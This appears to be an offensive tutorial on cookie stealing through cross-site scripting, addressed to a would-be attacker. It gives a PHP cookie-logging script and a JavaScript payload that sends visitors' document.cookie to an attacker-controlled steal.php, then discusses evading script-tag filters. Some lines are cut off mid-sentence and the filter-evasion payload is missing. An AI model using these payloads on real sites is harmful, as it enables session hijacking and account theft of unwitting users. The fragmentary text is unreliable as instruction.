What is Cookies Stealing?
Cookies stealing is one of the most fundamental aspects of XSS (cross site scripting). Why is the cookie so important? Well, first you should see exactly what sort of information is stored in a cookie. Go to a website that requires a login, and after logging in erase everything in your address bar and type this line of
Cookiestealing is a two-part process. You need to have a script to accept the cookie, and you need to have a way of sending the cookie to your script. Writing the script to accept the cookie is the easy part, whereas finding a way to send it to your script is the hard part. I’ll show you an example of a pHp script that accepts cookies:
$cookie = $_GET[‘cookie’];
$log = fopen(“log.txt”, “a”);
fwrite($log, $cookie .”\n”);
And there you have it, a simple cookiestealer. The way this script works is that it accepts the cookie when it is passed as a variable, in this case ‘cookie’ in the URL, and then saves it to a file called ‘log.txt’.
http://yourwebsite.c…ookie=steal.php is the filename of the script we just wrote, ? lets the script know that we are going to pass some variables to it, and after that we can set cookie equal to whatever we want, but what we want to do is set cookie equal to the cookie from the site. This is the second and harder part of the cookiestealer.
Most websites apply some sort of filter to input, so that you can’t directly insert your own code. XSS deals with finding exploits within filters, allowing you to put your own code into a website. This might sound difficult, and in most cases it’s not easy, but it can be very simple.
document.location = ‘http://yoursite.com/steal.php?cookie=’ + document.cookie;
Now whenever someone views the page that you posted this on, they will be redirected to your script with their cookie from this site in the URL. If you were to look at log.txt now, you’d see the cookies of whoever looked at that page. But cookiestealing is never that easy. Let’s assume now that the administrator of this site got smart, and decided to filter out script tags. Now you code doesn’t work, so we have to try and evade the filter. In this instance, it’s easy enough:
In this case, when the user clicks on the link they will be sent to your stealer with their cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get around filters.